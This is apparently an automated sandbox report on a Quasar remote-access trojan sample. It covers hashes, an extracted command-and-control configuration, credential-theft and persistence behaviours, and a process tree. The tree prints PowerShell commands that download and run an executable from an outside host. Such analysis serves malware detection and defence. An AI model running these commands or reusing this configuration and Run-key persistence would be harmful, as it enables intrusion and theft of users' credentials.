Analysis
-
max time kernel
148s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
29-07-2024 07:13
Static task
static1
Behavioral task
behavioral1
Sample
jdconstructnOrderfdp..exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
jdconstructnOrderfdp..exe
Resource
win10v2004-20240709-en
General
-
Target
jdconstructnOrderfdp..exe
-
Size
288KB
-
MD5
7e900eb50f9dc1cb5c68ffea4b9e7bcc
-
SHA1
4dcc14dc2b98fbc171308fb55b5b8551dd96ea96
-
SHA256
8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3
-
SHA512
a77aeffc4f80358940e40789a67f67df5adc1bde4790a400665a98871498b10c3206981d3f18efa1149c9ec246f0343d133dd77de4f5a1f5816506a204276b1a
-
SSDEEP
3072:6q6+ouCpk2mpcWJ0r+QNTBfRuk1qXkXRA4XTZK:6ldk1cWQRNTBpd8t
Malware Config
Extracted
quasar
1.4.1
Office04
192.228.105.2:4782
4ea5c3e6-40ed-401e-8a68-e96daa2a46a9
-
encryption_key
0FE4B3C613E3E61C318BA9D568DC6A8C56D2E505
-
install_name
jorder.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
svchost
-
subdirectory
SubDir
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1076-42-0x0000000005C10000-0x0000000005F35000-memory.dmp family_quasar behavioral2/memory/1076-43-0x0000000006680000-0x00000000069A4000-memory.dmp family_quasar -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 23 764 powershell.exe 25 3928 powershell.exe -
Processes:
powershell.exepowershell.exepid process 764 powershell.exe 3928 powershell.exe -
Downloads MZ/PE file
-
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe net_reactor behavioral2/memory/1076-35-0x0000000000870000-0x00000000008DE000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
jdconstructnOrderfdp..exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation jdconstructnOrderfdp..exe -
Executes dropped EXE 1 IoCs
Processes:
networkrunfdp.exepid process 1076 networkrunfdp.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
networkrunfdp.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkRun.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\networkrunfdp.exe" networkrunfdp.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
jdconstructnOrderfdp..exenetworkrunfdp.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jdconstructnOrderfdp..exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language networkrunfdp.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 764 powershell.exe 764 powershell.exe 3928 powershell.exe 3928 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exenetworkrunfdp.exedescription pid process Token: SeDebugPrivilege 764 powershell.exe Token: SeDebugPrivilege 3928 powershell.exe Token: SeDebugPrivilege 1076 networkrunfdp.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
networkrunfdp.exepid process 1076 networkrunfdp.exe 1076 networkrunfdp.exe -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
networkrunfdp.exepid process 1076 networkrunfdp.exe 1076 networkrunfdp.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
jdconstructnOrderfdp..execmd.exedescription pid process target process PID 368 wrote to memory of 3640 368 jdconstructnOrderfdp..exe cmd.exe PID 368 wrote to memory of 3640 368 jdconstructnOrderfdp..exe cmd.exe PID 3640 wrote to memory of 764 3640 cmd.exe powershell.exe PID 3640 wrote to memory of 764 3640 cmd.exe powershell.exe PID 3640 wrote to memory of 3928 3640 cmd.exe powershell.exe PID 3640 wrote to memory of 3928 3640 cmd.exe powershell.exe PID 3640 wrote to memory of 1076 3640 cmd.exe networkrunfdp.exe PID 3640 wrote to memory of 1076 3640 cmd.exe networkrunfdp.exe PID 3640 wrote to memory of 1076 3640 cmd.exe networkrunfdp.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:368 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A6DF.tmp\A6E0.tmp\A6F0.bat C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3640 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/networkrunfdp.exe' -OutFile networkrunfdp.exe"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3928 -
C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exenetworkrunfdp.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1076
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
1Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD56f857cbceb4b48c43f2483798a60bce7
SHA12945024e9161f9971d24c3d5042b614c781ed03a
SHA2560886411b6e8582aced80f9bd6269d6821c06750180e85b50adb99ec8c4b867ae
SHA51226db2e395d9b1b856ac4401d6576d5fa0631a7d0696c930ca1f683ec1812cc27406ff8c42f0538fd5e445d46f20aa68b826daf69738dd2647d1b8bea5a85c057
-
Filesize
334B
MD59aaac0122442ca0ebb4d8bb795e86676
SHA1594744d8e4d51273dd435c3fac5799bc5f180e8c
SHA2566af7e75e339241dac26eca99aa1290c1f420b45b4231212d20adf08aa287e373
SHA512d08a0dd3b40d80c7582c3f69a7868371e7eb03ac6f4658a39e7a9fb1dd34cc22a5e91d60b31af71c77cebfe0fd0c3827fdbb3cc35224189388345c61e756636c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
417KB
MD5a18b7de2990becc30f700720e19ebfef
SHA1b48c1a5c7756bccfe05d7999daeb96e7ab688cfd
SHA2562bf98c947ce0bd8e6e6a0c0493af056790d61ab86c7c47896b4688bdc60b68b5
SHA512484f8faf3973b74c96b6fea157774c627044fa4631e127de30f9f93468d38e73befa3c3bff3ea07108c82d943c9b56e79c5d6391d0e3a9b197869b0715d2808b